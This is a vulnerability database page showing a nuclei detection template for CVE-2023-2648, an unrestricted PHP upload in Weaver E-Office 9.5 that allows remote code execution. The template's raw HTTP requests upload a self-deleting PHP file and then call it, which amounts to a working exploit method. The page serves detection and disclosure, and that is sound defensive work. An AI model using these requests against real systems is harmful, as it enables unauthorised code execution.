Lucene search
K

Weaver E-Office 9.5 - Remote Code Execution

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 149 Views

Weaver E-Office 9.5 - Remote Code Execution vulnerabilit

Related
Refs
Code
id: CVE-2023-2648

info:
  name: Weaver E-Office 9.5 - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    A vulnerability was found in Weaver E-Office 9.5. It has been classified as critical. This affects an unknown part of the file /inc/jquery/uploadify/uploadify.php. The manipulation of the argument Filedata leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of Weaver E-Office.
  reference:
    - https://github.com/sunyixuan1228/cve/blob/main/weaver.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2648
    - https://vuldb.com/?ctiid.228777
    - https://vuldb.com/?id.228777
    - https://github.com/bingtangbanli/cve-2023-2523-and-cve-2023-2648
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-2648
    cwe-id: CWE-434
    epss-score: 0.28478
    epss-percentile: 0.97891
    cpe: cpe:2.3:a:weaver:e-office:9.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: weaver
    product: e-office
    fofa-query:
      - app="泛微-EOffice"
      - app="泛微-eoffice"
  tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive,vkev,vuln
variables:
  file: '{{rand_base(5, "abc")}}'
  string: "CVE-2023-2648"

http:
  - raw:
      - |
        POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
        Content-Disposition: form-data; name="Filedata"; filename="{{file}}.php."
        Content-Type: image/jpeg

        <?php echo md5("{{string}}");unlink(__FILE__);?>
        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
      - |
        POST /attachment/{{name}}/{{file}}.php  HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(string)}}'

      - type: status
        part: body_2
        status:
          - 200

    extractors:
      - type: regex
        name: name
        part: body
        group: 1
        regex:
          - "([0-9]+)"
        internal: true
# digest: 4a0a00473045022029ff42eab0841f87601862a096ebca8c60c7c85aa360345c1c0e6943cc379a8b022100bc72992f1129eee460a22bf1304cd76c745b6e9d4a31322fedb68ffc4ff56e1d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.17.3 - 9.8
CVSS 27.5
CVSS 37.3
EPSS0.32895
SSVC
149